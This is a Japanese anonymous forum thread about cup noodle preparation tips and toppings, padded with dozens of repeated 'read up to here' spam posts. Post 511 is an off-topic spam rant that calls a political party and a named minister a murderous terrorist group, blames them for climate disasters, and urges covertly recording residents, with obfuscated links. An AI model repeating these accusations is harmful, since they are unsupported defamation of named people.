しおヌードルにポテトチップスを入れると最高に旨い!

451 :すぐ名無し、すごく名無し:2012/03/27(火) 05:12:13.46 ID:9tGfhegy.net
日清カップヌードルしょうゆ、シーフード、カレーの定番3品を作り鍋に全部ぶち込む
一体どうなってしまうのか

452 :すぐ名無し、すごく名無し:2013/01/12(土) 15:29:16.82 ID:0w5dh/cB.net
うんまい

453 :すぐ名無し、すごく名無し:2013/02/17(日) 21:30:20.41 ID:IuQSSBMR.net
ほていの焼き鳥を乗せる

454 :すぐ名無し、すごく名無し:2013/02/21(木) 14:29:06.09 ID:fpDcCxoN.net
カップから出して鍋で3分煮る
メンマ、チャーシュー、ネギをのせる

455 :すぐ名無し、すごく名無し:2013/02/23(土) 17:21:34.43 ID:wV39v6+w.net
ミキサーにかけて粉末にする。

456 :すぐ名無し、すごく名無し:2013/02/24(日) 00:35:44.21 ID:I16XG7If.net
これは10年以上前に人気のあったサイトだけど、記念にリンクしておくか。

「萌え」っていう言葉がまだ一部のオタクの用語に過ぎなかった頃のことだけど、既に連発してたな。

http://koi2.chu.jp/ch/cupmen.html

457 :すぐ名無し、すごく名無し:2013/02/24(日) 10:05:43.42 ID:usaqQrFT.net
>>455
粉末にしてからどうすんだよw

458 :すぐ名無し、すごく名無し:2013/03/03(日) 16:35:18.27 ID:Ydsd876v.net
>>451
たぶん、薄めのカレー味になると思うよ。

459 :すぐ名無し、すごく名無し:2014/10/20(月) 23:20:37.87 ID:hQcDcTr5.net
透明のプラッチックのフォークで
銀座の歩行者天国で歩き食い。

460 :すぐ名無し、すごく名無し:2014/10/23(木) 09:07:02.11 ID:Ts6ofRwQ.net
具(特に海老)が好きではないので具を極力食べ切ってから麺とスープを味わう

461 :すぐ名無し、すごく名無し:2014/10/23(木) 22:35:00.16 ID:2vo5sYra.net
俺、えびだけはお湯入れる前に抜くよ。
あの匂いがでぇっきれぇっ!

462 :すぐ名無し、すごく名無し:2014/11/08(土) 19:18:31.34 ID:AGxWOUP8.net
二郎風にモヤシを積み上げる

463 :すぐ名無し、すごく名無し:2015/07/14(火) 18:53:39.14 ID:DzQZk9TL.net
パスタスタイルは邪道だ!つーかスパ王の立場は!?

464 :すぐ名無し、すごく名無し:2016/04/12(火) 22:23:35.79 ID:HfdhYoTR.net
美味しい、贅沢だしすっぽんスープ味。だけど、贅沢仕上げ香味油を入れると美味しくない 、あっさり派は。

465 :すぐ名無し、すごく名無し:2016/04/12(火) 23:20:14.57 ID:CkMqvuy2.net
日清CM、一週間でお蔵入り、矢口復帰一発目ww
お蔵入りCM見れた
http://entachannel.blog.fc2.com/blog-entry-7.html

466 :すぐ名無し、すごく名無し:2016/04/13(水) 15:14:26.69 ID:uXpWdtm6.net
不倫ヌードル

467 :すぐ名無し、すごく名無し:2016/04/17(日) 10:41:43.09 ID:GtAvV/pJ.net
矢口起用した時点で日清は本物のバカで無能。
世間は単純に笑うとでも思ったのか?火に油注いだ勢いだわ

468 :ここまで読みました:2016/07/28(木) 21:17:57.94 ID:UcYDktf/.net
ここまで読みました

469 :ここまで読みました:2016/07/30(土) 07:21:12.45 ID:X4p+gOr+.net
ここまで読みました

470 :ここまで読みました:2016/08/01(月) 07:25:26.06 ID:UKXn1iTh.net
ここまで読みました

471 :ここまで読みました:2016/08/03(水) 07:01:13.65 ID:4bOkqaJK.net
ここまで読みました

472 :ここまで読みました:2016/08/06(土) 07:28:36.64 ID:fDAm3PAB.net
ここまで読みました

473 :ここまで読みました:2016/08/08(月) 07:05:03.44 ID:bHA7fXXF.net
ここまで読みました

474 :ここまで読みました:2016/08/10(水) 07:50:19.23 ID:SCJpppFS.net
ここまで読みました

475 :ここまで読みました:2016/08/13(土) 07:34:31.15 ID:v4WTFZzn.net
ここまで読みました

476 :ここまで読みました:2016/08/17(水) 07:21:47.81 ID:VxdFX0qL.net
ここまで読みました

477 :ここまで読みました:2016/08/20(土) 07:14:34.30 ID:lOU0EgHm.net
ここまで読みました

478 :ここまで読みました:2016/08/22(月) 08:06:46.98 ID:Fr21Ky80.net
ここまで読みました

479 :ここまで読みました:2016/09/01(木) 07:02:51.85 ID:C1JpYX1Y.net
ここまで読みました

480 :ここまで読みました:2016/09/03(土) 07:52:12.28 ID:W/rnNu8H.net
ここまで読みました

481 :ここまで読みました:2016/09/10(土) 09:11:41.57 ID:Km8UC2Zk.net
ここまで読みました

482 :ここまで読みました:2016/09/12(月) 07:11:09.31 ID:Ac+Y1JD3.net
ここまで読みました

483 :ここまで読みました:2016/09/17(土) 07:44:01.47 ID:9LLy69QM.net
ここまで読みました

484 :ここまで読みました:2016/09/24(土) 07:55:47.86 ID:0DZhG9xW.net
ここまで読みました

485 :ここまで読みました:2016/09/29(木) 07:13:37.83 ID:QgssdCwP.net
ここまで読みました

486 :ここまで読みました:2016/10/02(日) 07:02:50.40 ID:2xOHMdtd.net
ここまで読みました

487 :ここまで読みました:2016/10/06(木) 07:07:17.90 ID:T9e3/VJA.net
ここまで読みました

488 :ここまで読みました:2016/10/15(土) 09:58:10.90 ID:EJsrn6DV.net
ここまで読みました

489 :ここまで読みました:2016/10/21(金) 07:46:04.99 ID:+zcZDUtj.net
ここまで読みました

490 :ここまで読みました:2016/10/29(土) 07:02:09.65 ID:WP9pqvMv.net
ここまで読みました

491 :ここまで読みました:2016/11/04(金) 07:57:28.02 ID:wtDBg+5J.net
ここまで読みました

492 :ここまで読みました:2016/11/11(金) 07:33:46.56 ID:qEbrPBBL.net
ここまで読みました

493 :ここまで読みました:2016/11/15(火) 07:10:24.69 ID:xcUnzKp4.net
ここまで読みました

494 :ここまで読みました:2016/11/18(金) 07:25:52.48 ID:R8Yh78dT.net
ここまで読みました

495 :ここまで読みました:2016/11/21(月) 07:45:45.19 ID:JrtLvZGy.net
ここまで読みました

496 :ここまで読みました:2016/11/25(金) 07:55:37.97 ID:Dr0IACWT.net
ここまで読みました

497 :ここまで読みました:2016/11/28(月) 07:34:38.50 ID:7s2MLKDb.net
ここまで読みました

498 :ここまで読みました:2016/12/03(土) 07:09:41.51 ID:w3k5C7dR.net
ここまで読みました

499 :ここまで読みました:2016/12/06(火) 08:05:20.37 ID:8eVG+P13.net
ここまで読みました

500 :ここまで読みました:2016/12/11(日) 07:55:10.82 ID:I7v/3y4p.net
ここまで読みました

501 :ここまで読みました:2016/12/17(土) 11:35:52.77 ID:ZABTtd9R.net
ここまで読みました

502 :ここまで読みました:2016/12/23(金) 07:04:37.50 ID:LubX13Sp.net
ここまで読みました

503 :ここまで読みました:2016/12/30(金) 07:05:11.89 ID:+yq0QApf.net
ここまで読みました

504 :ここまで読みました:2017/01/04(水) 07:21:50.57 ID:GRmUXpJw.net
ここまで読みました

505 :ここまで読みました:2017/02/19(日) 01:44:38.52 ID:SaRWx0Ui.net
ここまで読みました

506 :ここまで読みました:2017/03/12(日) 16:48:34.49 ID:jhceec81.net
ここまで読みました

507 :ここまで読みました:2017/05/04(木) 09:30:10.90 ID:be81y8gu.net
ここまで読みました

508 :ここまで読みました:2018/12/24(月) 15:27:17.30 ID:Xt32Dk3c.net
ここまで読みました

509 :すぐ名無し、すごく名無し:2021/06/06(日) 12:17:00.33 ID:pDVuuwoy.net
i.imgur.com/SoACinT.png
i.imgur.com/gejkU2H.jpg
i.imgur.com/XNUwqGb.jpg
pbs.twimg.com/media/E3ATl_nUYAUi3xt.jpg
pbs.twimg.com/media/E3AN-VeVoAIQRY1.jpg  

510 :すぐ名無し、すごく名無し:2022/04/04(月) 20:07:04.91 ID:9/NoscTU.net
NBG

511 :すぐ名無し、すごく名無し:2023/08/23(水) 22:13:47.09 ID:ZTItDsL/N
力による一方的な現状変更によって都心まで数珠つなぎて゛クソ航空機飛ばして騒音に温室効果カ゛スにコロナにとまき散らして莫大な温室効果
ガスまき散らして気候変動させて海水温上昇させてかつてない量の水蒸気を日本列島に供給させて土砂崩れに洪水,暴風、猛暑.森林火災.
大雪にと災害連発させて住民の人生を破壊どころか殺害しまくって静音が生命線の知的産業を根絶やしにして住民の権利強奪して私腹を肥やす
強盗殺人を繰り返している世界最悪の殺人テロ組織国土破壊省斉藤鉄夫ら公明党議員個人をあらゆるネタを駆使して積極的に各個撃破しよう!
例えば、ボイスレコーダ一を持ってテロ組織公明党のポスターを貼ってる住民に「公明党議員って物とか色々買ってきてくれていいよね」
「どんな物買ってきてもらったの?」「私も買ってきてほしいんだけど創価学会に入らないとダメ?」とかそんな感し゛で話しかけてみよう!
容易に選挙買収の証拠を得られるので、検察に告発しよう!大抵ジジバハ゛住民なわけだが、公明党か゛やってるのは年金減らしてそれを財源に
ミ二ハ゛ンやら乗って裕福な暮らししてる子か゛居る税金泥棒世帯にさらに税金給付しようとしてるわけた゛がセコヰエサで大損してて滑稽だよな
(羽田)tтPs://www.call4.jp/info.phр?tyРe=items&id=I0000062 , Ttps://haneda-project.jimdofree.com/
(成田)tТps://n-souonhigaisosyoudan.amebaownd.com/
(テロ組織)ΤTps://i.imgur.com/hnli1ga.jpeg

512 :すぐ名無し、すごく名無し:2023/09/21(木) 22:48:23.33 ID:T/ZoZ03d.net
ワシもこっちの道のお陰で助かったで

101 KB
新着レスの表示

掲示板に戻る 全部 前100 次100 最新50
名前: E-mail (省略可) :

read.cgi ver 2014.07.20.01.SC 2014/07/20 D ★